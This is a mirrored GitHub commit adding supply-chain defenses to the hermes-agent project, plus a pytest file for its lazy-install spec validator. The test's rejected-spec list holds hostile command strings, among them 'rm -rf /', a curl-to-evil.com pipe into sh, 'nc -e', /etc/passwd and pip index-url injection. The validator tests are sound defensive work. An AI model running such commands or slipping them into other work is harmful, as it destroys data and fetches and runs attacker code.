mirror of
https://github.com/NousResearch/hermes-agent.git
synced 2026-05-18 04:41:56 +00:00
* feat(security): supply-chain advisory checker + lazy-install framework + tiered install fallback
Three coordinated mitigations for the Mini Shai-Hulud worm hitting
mistralai 2.4.6 on PyPI (2026-05-12) and for the next single-package
compromise that follows.
# What this PR makes true
1. Users with the poisoned mistralai 2.4.6 in their venv get a loud
detection banner with copy-pasteable remediation steps the moment
they run hermes (and on every gateway startup).
2. One quarantined / yanked PyPI package can no longer silently demote
a fresh install to 'core only' — the installer keeps every other
extra and tells the user which tier landed.
3. Future opt-in backends (Mistral, ElevenLabs, Honcho, etc.) can
lazy-install on first use under a strict allowlist, instead of
eagerly pulling everything at install time.
# Detection: hermes_cli/security_advisories.py
- ADVISORIES catalog (one entry currently: shai-hulud-2026-05 for
mistralai==2.4.6). Adding the next one is a single dataclass.
- detect_compromised() uses importlib.metadata.version() — no pip
dependency, works in uv venvs that lack pip.
- Banner cache (~/.hermes/cache/advisory_banner_seen) rate-limits
the startup banner to once per 24h per advisory.
- Acks persisted to security.acked_advisories in config.yaml; never
re-banner after ack.
- Wired into:
* hermes doctor — runs first, prints full remediation block
* hermes doctor --ack <id> — dismisses an advisory
* cli.py interactive run() and single-query branches — short
stderr banner pointing at hermes doctor
* gateway/run.py startup — operator-visible warning in gateway.log
# Lazy-install framework: tools/lazy_deps.py
- LAZY_DEPS allowlist maps namespaced feature keys (tts.elevenlabs,
memory.honcho, provider.bedrock, etc.) to pip specs.
- ensure(feature) installs missing deps in the active venv via the
uv → pip → ensurepip ladder (matches tools_config._pip_install).
- Strict spec safety regex rejects URLs, file paths, shell metas,
pip flag injection, control chars — only PyPI-by-name accepted.
- Gated on security.allow_lazy_installs (default true) plus the
HERMES_DISABLE_LAZY_INSTALLS env var for restricted/audited envs.
- Migrated three backends as proof of pattern:
* tools/tts_tool.py — _import_elevenlabs() calls ensure first
* plugins/memory/honcho/client.py — get_honcho_client lazy-installs
* tts.mistral / stt.mistral entries pre-registered for when PyPI
restores mistralai
# Installer fallback tiers
scripts/install.sh, scripts/install.ps1, setup-hermes.sh:
- Centralised _BROKEN_EXTRAS list (currently: mistral). Edit one
array when a transitive breaks; users keep every other extra.
- New 'all minus known-broken' tier between [all] and the existing
PyPI-only-extras tier. Only kicks in when [all] fails resolve.
- All three tiers explicit: every fallback announces which tier
landed and prints a re-run hint when not on Tier 1.
- install.ps1 and install.sh both regenerate their tier specs from
the same _BROKEN_EXTRAS array so updates stay in sync.
Side effect: install.ps1 Tier 2 spec previously hardcoded 'mistral'
in its extra list — bug fixed by the refactor (mistral is filtered
out).
# Config
hermes_cli/config.py — DEFAULT_CONFIG.security gains:
- acked_advisories: [] (advisory IDs the user has dismissed)
- allow_lazy_installs: True (security gate for ensure())
No config version bump needed — both keys nest under existing
security: block, and load_config's deep-merge picks up DEFAULT_CONFIG
defaults for users with older configs.
# Tests
tests/hermes_cli/test_security_advisories.py — 23 tests covering:
- detect_compromised matches/non-matches, wildcard frozenset
- ack persistence, idempotence, blank rejection, config-failure path
- banner cache rate limiting + 24h re-banner + ack-stops-banner
- short_banner_lines / full_remediation_text / render_doctor_section /
gateway_log_message
- shipped catalog well-formedness invariant
tests/tools/test_lazy_deps.py — 40 tests covering:
- spec safety: 11 safe parametrized + 18 unsafe parametrized
- allowlist: unknown-feature rejection, namespace.name shape,
every shipped spec passes the safety regex
- security gating: config flag, env var, default, fail-open
- ensure() happy/sad paths: already-satisfied, install success,
pip stderr surfaced on failure, install-succeeds-but-still-missing
- is_available, feature_install_command
Combined: 63 new tests, all passing under scripts/run_tests.sh.
# Validation
- scripts/run_tests.sh tests/hermes_cli/test_security_advisories.py
tests/tools/test_lazy_deps.py → 63/63 passing
- scripts/run_tests.sh tests/hermes_cli/test_doctor.py
tests/hermes_cli/test_doctor_command_install.py
tests/tools/test_tts_mistral.py tests/tools/test_transcription_tools.py
tests/tools/test_transcription_dotenv_fallback.py → 165/165 passing
- scripts/run_tests.sh tests/hermes_cli/ tests/tools/ →
9191 passed, 8 pre-existing failures (verified on origin/main
before this change)
- bash -n on install.sh and setup-hermes.sh → OK
- py_compile on all modified .py files → OK
- End-to-end smoke test of detect_compromised + render_doctor_section
+ gateway_log_message with mocked installed version → produces
copy-pasteable remediation output
# Community
Full advisory + remediation steps:
website/docs/community/security-advisories/shai-hulud-mistralai-2026-05.md
Short-form post drafts (Discord, GitHub pinned issue, README banner):
scripts/community-announcement-shai-hulud.md
Refs: PR #24205 (mistral disabled), Socket Security advisory
<https://socket.dev/blog/mini-shai-hulud-worm-pypi>
* build(deps): pin every direct dep to ==X.Y.Z (no ranges)
Companion to the supply-chain advisory work: replace every >=/</~= range
in pyproject.toml's [project.dependencies] and [project.optional-dependencies]
with an exact ==X.Y.Z pin sourced from uv.lock.
Why: ranges allow PyPI to ship a fresh version of any direct dep at any
time without a code review on our side. With ranges, the malicious
mistralai 2.4.6 release would have been pulled by every fresh
'pip install -e .[all]' for the hours between upload and PyPI's
quarantine — exactly the install window we got hit on. Exact pins close
that window: the only way a new package version reaches a user is via
an intentional update on our end.
What the user-facing change is: nothing, behavior-wise. Every package
resolves to the same version it was already resolving to via uv.lock —
the pins just remove the resolver's freedom to pick a different one.
Cost: any user installing Hermes alongside another package that requires
a newer pin gets a resolver conflict. Acceptable for our isolated-venv
install path; documented in the new comment block.
Build-system requires line (setuptools>=61.0) is intentionally left
as a range — pinning the build backend would block fresh pip from
bootstrapping the build on architectures where that exact wheel isn't
available.
mistral extra (mistralai==2.3.0) is pinned but stays out of [all]
(per PR #24205). 'uv lock' regeneration will fail until PyPI restores
mistralai; lockfile regeneration is gated behind that, NOT on every PR.
LAZY_DEPS in tools/lazy_deps.py also moved to exact pins so the lazy-
install pathway can never resolve a different version than the one
declared in pyproject.toml.
Validation:
- Cross-checked all 77 pinned direct deps in pyproject.toml against
uv.lock — every pin matches the resolved version exactly.
- Cross-checked all LAZY_DEPS specs against uv.lock — same.
- 'uv pip install -e .[all] --dry-run' resolves 205 packages cleanly.
- tests/tools/test_lazy_deps.py + tests/hermes_cli/test_security_advisories.py
→ 63/63 passing (every shipped spec passes the safety regex).
- Doctor + TTS + transcription targeted suite → 146/146 passing.
* build(deps): hash-verify transitives via uv.lock; remove unresolvable [mistral] extra
You asked: 'what about the dependencies the dependencies rely on?' —
correctly noting that exact-pinning direct deps in pyproject.toml does
NOT cover the transitive graph. `pip install` and `uv pip install` both
re-resolve transitives fresh from PyPI at install time, so a compromised
transitive (e.g. `httpcore` if it got worm-poisoned tomorrow) would
still hit our users even with every direct dep exact-pinned.
# What this commit fixes
1. **Both real installer scripts now prefer `uv sync --locked` as Tier 0.**
uv.lock records SHA256 hashes for every transitive — a compromised
package with a different hash gets REJECTED. Falls through to the
existing `uv pip install` cascade if the lockfile is missing or
stale, with a loud warning that the fallback path does NOT
hash-verify transitives. Previously only `setup-hermes.sh` (the dev
path) used the lockfile; `scripts/install.sh` and `scripts/install.ps1`
(the paths fresh users actually run) skipped it.
2. **Removed the `[mistral]` extra entirely.** The `mistralai` PyPI
project is fully quarantined right now — every version returns 404,
so any pin we wrote was unresolvable, which broke `uv lock --check`
in CI. Restoration is documented in pyproject.toml as a 5-step
checklist (verify, re-add extra, re-enable in 4 modules, regenerate
lock, optionally re-add to [all]).
3. **Regenerated uv.lock.** 262 packages, mistralai/eval-type-backport/
jsonpath-python pruned. `uv lock --check` now passes.
# Defense-in-depth view
| Layer | Where | Protects against |
|----------------------------|-------------------|-------------------------------------------|
| Exact pins in pyproject | direct deps | new mistralai 2.4.6-style direct compromise |
| uv.lock + `--locked` install | transitive graph | transitive worm injection |
| Tier-0 hash-verified path | install.sh / .ps1 | actually USE the lockfile in fresh installs |
| `uv lock --check` CI gate | every PR | drift between pyproject and lockfile |
| `hermes_cli/security_advisories.py` | runtime | cleanup for users who already got hit |
The exact pinning + hash verification together close the supply-chain
gap. Without the lockfile path, exact pins alone are theater.
# Validation
- `uv lock --check` → passes (262 packages resolved, no drift).
- `bash -n` on install.sh + setup-hermes.sh → OK.
- 209/209 tests passing across new + adjacent test files
(test_lazy_deps.py, test_security_advisories.py, test_doctor.py,
test_tts_mistral.py, test_transcription_tools.py).
- TOML parse OK.
* chore: remove community announcement drafts (PR body covers it)
* build(deps): lazy-install every opt-in backend (anthropic, search, terminal, platforms, dashboard)
Extends the lazy-install framework to cover everything that's not used by
every hermes session. Base install drops from ~60 packages to 45.
Moved out of core dependencies = []:
- anthropic (only when provider=anthropic native, not via aggregators)
- exa-py, firecrawl-py, parallel-web (search backends; only when picked)
- fal-client (image gen; only when picked)
- edge-tts (default TTS but still optional)
New extras in pyproject.toml: [anthropic] [exa] [firecrawl] [parallel-web]
[fal] [edge-tts]. All added to [all].
New LAZY_DEPS entries: provider.anthropic, search.{exa,firecrawl,parallel},
tts.edge, image.fal, memory.hindsight, platform.{telegram,discord,matrix},
terminal.{modal,daytona,vercel}, tool.dashboard.
Each import site now calls ensure() before importing the SDK. Where the
module had a top-level try/except (telegram, discord, fastapi), the
graceful-fallback pattern was extended to lazy-install on first
check_*_requirements() call and re-bind module globals.
Updated test_windows_native_support.py tzdata check from snapshot
(>=2023.3 literal) to invariant (any version + win32 marker).
Validation:
- Base install: 45 packages (was ~60); 6 newly-extracted packages absent
- uv lock --check: passes (262 packages, no drift)
- 209/209 lazy_deps + advisory + doctor + tts/transcription tests passing
- py_compile clean on all 12 modified modules
228 lines
9 KiB
Python
228 lines
9 KiB
Python
"""Tests for tools.lazy_deps — the supply-chain-resilient on-demand installer.
|
|
|
|
The lazy_deps module is the architectural fix for the "one quarantined
|
|
package nukes 10 unrelated extras" problem. It exposes ``ensure(feature)``
|
|
which only installs from a strict allowlist, refuses anything that looks
|
|
like a URL / file path, runs venv-scoped, and respects the
|
|
``security.allow_lazy_installs`` config flag.
|
|
|
|
These tests cover the security boundary and the public API. The real pip
|
|
call is mocked — we never actually shell out during unit tests.
|
|
"""
|
|
|
|
from __future__ import annotations
|
|
|
|
from typing import Iterator
|
|
|
|
import pytest
|
|
|
|
import tools.lazy_deps as ld
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Spec safety
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
class TestSpecSafety:
|
|
@pytest.mark.parametrize("spec", [
|
|
"mistralai>=2.3.0,<3",
|
|
"elevenlabs>=1.0,<2",
|
|
"honcho-ai>=2.0.1,<3",
|
|
"boto3>=1.35.0,<2",
|
|
"mautrix[encryption]>=0.20,<1",
|
|
"google-api-python-client>=2.100,<3",
|
|
"youtube-transcript-api>=1.2.0",
|
|
"qrcode>=7.0,<8",
|
|
"package", # bare name, no version
|
|
"package==1.0.0",
|
|
"package~=1.0",
|
|
])
|
|
def test_safe_specs_pass(self, spec):
|
|
assert ld._spec_is_safe(spec), f"expected {spec!r} to be safe"
|
|
|
|
@pytest.mark.parametrize("spec", [
|
|
# URL-shaped → rejected (no remote origin override allowed)
|
|
"git+https://github.com/foo/bar.git",
|
|
"https://example.com/foo.tar.gz",
|
|
# File path → rejected
|
|
"/etc/passwd",
|
|
"./local-malware",
|
|
"../escape",
|
|
# Shell metacharacters → rejected
|
|
"package; rm -rf /",
|
|
"package && curl evil.com | sh",
|
|
"package`whoami`",
|
|
"package$(whoami)",
|
|
"package|nc -e",
|
|
# Pip flag injection → rejected
|
|
"--index-url=http://evil/",
|
|
"-r requirements.txt",
|
|
# Whitespace control chars → rejected
|
|
"package\nshell-injection",
|
|
"package\rmore",
|
|
# Empty / overly long → rejected
|
|
"",
|
|
"x" * 500,
|
|
])
|
|
def test_unsafe_specs_rejected(self, spec):
|
|
assert not ld._spec_is_safe(spec), \
|
|
f"expected {spec!r} to be rejected"
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# Allowlist enforcement
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
class TestAllowlist:
|
|
def test_unknown_feature_raises(self, monkeypatch):
|
|
monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
|
|
with pytest.raises(ld.FeatureUnavailable, match="not in LAZY_DEPS"):
|
|
ld.ensure("not.a.real.feature")
|
|
|
|
def test_lazy_deps_keys_use_namespace_dot_name(self):
|
|
# Sanity check on the data shape — every key should be at least
|
|
# one dot-separated namespace.
|
|
for key in ld.LAZY_DEPS:
|
|
assert "." in key, f"feature {key!r} should be namespace.name"
|
|
|
|
def test_every_lazy_dep_spec_passes_safety(self):
|
|
# Defence in depth — even though specs are author-controlled,
|
|
# the safety regex must accept everything we ship.
|
|
for feature, specs in ld.LAZY_DEPS.items():
|
|
for spec in specs:
|
|
assert ld._spec_is_safe(spec), \
|
|
f"{feature}: spec {spec!r} fails safety check"
|
|
|
|
def test_feature_install_command_returns_pip_invocation(self):
|
|
cmd = ld.feature_install_command("memory.honcho")
|
|
assert cmd is not None
|
|
assert cmd.startswith("uv pip install")
|
|
assert "honcho-ai" in cmd
|
|
|
|
def test_feature_install_command_unknown(self):
|
|
assert ld.feature_install_command("not.real") is None
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# allow_lazy_installs gating
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
class TestSecurityGating:
|
|
def test_disabled_via_config_raises(self, monkeypatch):
|
|
# Pretend honcho is missing AND lazy installs are disabled.
|
|
monkeypatch.setitem(ld.LAZY_DEPS, "test.feat", ("packageX>=1.0,<2",))
|
|
monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
|
|
monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: False)
|
|
with pytest.raises(ld.FeatureUnavailable, match="lazy installs disabled"):
|
|
ld.ensure("test.feat", prompt=False)
|
|
|
|
def test_disabled_via_env_var(self, monkeypatch):
|
|
monkeypatch.setenv("HERMES_DISABLE_LAZY_INSTALLS", "1")
|
|
# Bypass config layer; the env var alone must disable.
|
|
monkeypatch.setattr(
|
|
"hermes_cli.config.load_config",
|
|
lambda: {"security": {"allow_lazy_installs": True}},
|
|
)
|
|
assert ld._allow_lazy_installs() is False
|
|
|
|
def test_default_allows(self, monkeypatch):
|
|
monkeypatch.delenv("HERMES_DISABLE_LAZY_INSTALLS", raising=False)
|
|
monkeypatch.setattr(
|
|
"hermes_cli.config.load_config",
|
|
lambda: {"security": {}},
|
|
)
|
|
assert ld._allow_lazy_installs() is True
|
|
|
|
def test_config_failure_fails_open(self, monkeypatch):
|
|
# If config can't be read at all, we ALLOW installs rather than
|
|
# blocking the user out of their own backends.
|
|
monkeypatch.delenv("HERMES_DISABLE_LAZY_INSTALLS", raising=False)
|
|
monkeypatch.setattr(
|
|
"hermes_cli.config.load_config",
|
|
lambda: (_ for _ in ()).throw(RuntimeError("config broken")),
|
|
)
|
|
assert ld._allow_lazy_installs() is True
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# ensure() happy/sad paths
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
class TestEnsure:
|
|
def test_already_satisfied_is_noop(self, monkeypatch):
|
|
# If the package is importable, ensure() returns without calling pip.
|
|
monkeypatch.setitem(ld.LAZY_DEPS, "test.satisfied", ("zzzfake>=1",))
|
|
monkeypatch.setattr(ld, "_is_satisfied", lambda spec: True)
|
|
# If pip were called, this would fail loudly.
|
|
monkeypatch.setattr(
|
|
ld, "_venv_pip_install",
|
|
lambda *a, **kw: pytest.fail("pip should not be called"),
|
|
)
|
|
ld.ensure("test.satisfied", prompt=False) # no exception
|
|
|
|
def test_install_success_path(self, monkeypatch):
|
|
monkeypatch.setitem(ld.LAZY_DEPS, "test.install", ("zzzfake>=1",))
|
|
# First check sees missing, post-install check sees installed.
|
|
call_count = {"n": 0}
|
|
|
|
def fake_satisfied(spec):
|
|
call_count["n"] += 1
|
|
return call_count["n"] > 1 # missing first, installed after
|
|
|
|
monkeypatch.setattr(ld, "_is_satisfied", fake_satisfied)
|
|
monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
|
|
monkeypatch.setattr(
|
|
ld, "_venv_pip_install",
|
|
lambda specs, **kw: ld._InstallResult(True, "ok", ""),
|
|
)
|
|
ld.ensure("test.install", prompt=False)
|
|
|
|
def test_install_failure_surfaces_pip_stderr(self, monkeypatch):
|
|
monkeypatch.setitem(ld.LAZY_DEPS, "test.fail", ("zzzfake>=1",))
|
|
monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
|
|
monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
|
|
monkeypatch.setattr(
|
|
ld, "_venv_pip_install",
|
|
lambda specs, **kw: ld._InstallResult(
|
|
False, "", "ERROR: package not found on PyPI"
|
|
),
|
|
)
|
|
with pytest.raises(ld.FeatureUnavailable, match="pip install failed"):
|
|
ld.ensure("test.fail", prompt=False)
|
|
|
|
def test_install_succeeds_but_still_missing_raises(self, monkeypatch):
|
|
# Pip says success but the package still isn't importable
|
|
# (e.g. site-packages caching, wrong python). Surface this.
|
|
monkeypatch.setitem(ld.LAZY_DEPS, "test.cache", ("zzzfake>=1",))
|
|
monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
|
|
monkeypatch.setattr(ld, "_allow_lazy_installs", lambda: True)
|
|
monkeypatch.setattr(
|
|
ld, "_venv_pip_install",
|
|
lambda specs, **kw: ld._InstallResult(True, "ok", ""),
|
|
)
|
|
with pytest.raises(ld.FeatureUnavailable, match="still not importable"):
|
|
ld.ensure("test.cache", prompt=False)
|
|
|
|
|
|
# ---------------------------------------------------------------------------
|
|
# is_available
|
|
# ---------------------------------------------------------------------------
|
|
|
|
|
|
class TestIsAvailable:
|
|
def test_unknown_feature_returns_false(self):
|
|
assert ld.is_available("not.a.thing") is False
|
|
|
|
def test_satisfied_returns_true(self, monkeypatch):
|
|
monkeypatch.setitem(ld.LAZY_DEPS, "test.avail", ("zzzfake>=1",))
|
|
monkeypatch.setattr(ld, "_is_satisfied", lambda spec: True)
|
|
assert ld.is_available("test.avail") is True
|
|
|
|
def test_missing_returns_false(self, monkeypatch):
|
|
monkeypatch.setitem(ld.LAZY_DEPS, "test.miss", ("zzzfake>=1",))
|
|
monkeypatch.setattr(ld, "_is_satisfied", lambda spec: False)
|
|
assert ld.is_available("test.miss") is False
|